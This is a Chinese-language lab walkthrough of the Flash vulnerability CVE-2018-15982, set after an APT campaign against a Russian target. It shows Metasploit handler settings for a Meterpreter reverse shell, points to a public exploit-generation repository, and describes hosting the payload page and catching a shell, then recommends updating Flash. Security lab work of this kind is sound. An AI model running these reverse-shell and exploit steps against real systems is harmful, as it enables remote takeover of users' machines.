2018年11月25日,烏俄兩國又突發了“刻赤海峽”事件,烏克蘭的數艘海軍軍艦在向刻赤海峽航行期間,與俄羅斯海軍發生了激烈沖突,引發了全世界的高度關注。在2018年11月29日,“刻赤海峽”事件後稍晚時間,某團隊立刻發起了針對俄羅斯的APT攻擊行動。值得注意的是此次攻擊相關樣本來源于烏克蘭,攻擊目标則指向俄羅斯總統辦公室所屬的醫療機構。攻擊者精心準備了一份俄文内容的員工問卷文檔,該文檔使用了最新的Flash 0day漏洞CVE-2018-15982和帶有自毀功能的專屬木馬程式進行攻擊,種種技術細節表明該APT組織不惜代價要攻下目标,但同時又十分小心謹慎。在發現攻擊後,Adobe官方及時響應後在12月5日加急釋出了新的Flash 32.0.0.101版本修複了此次的0day漏洞。
受影響版本包括:
下面我們就此版本進行漏洞攻擊實驗。
0X1 環境搭建
攻擊機:kali3.0
靶 機: Win7/Win10,安裝flash舊版本
0X2 漏洞利用
首先利用Metasploit的msfvenom建立payload攻擊程式:
監聽payload,用來接受反彈的shell:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp_rc4
set LPORT 6666
set LHOST 192.168.0.104
set RC4PASSWORD zale
接下來,我們生成攻擊的程式和網頁,生成腳本EXP下載下傳位址:
https://github.com/Ridter/CVE-2018-15982_EXP
通過-h參數檢視腳本使用:
利用該腳本對剛才的檔案進行利用,生成漏洞檔案:
将該檔案拷貝到kali下的web環境中,并開啟apache服務:
我們在Win7上安裝的flag版本是:Adobe_Flash_Player_28.0.0.111版本
安裝完畢後,通路kali的http服務:
kali中檢視監聽設定,發現shell已經過來了:
0X3漏洞修複
更新到flash的最新版本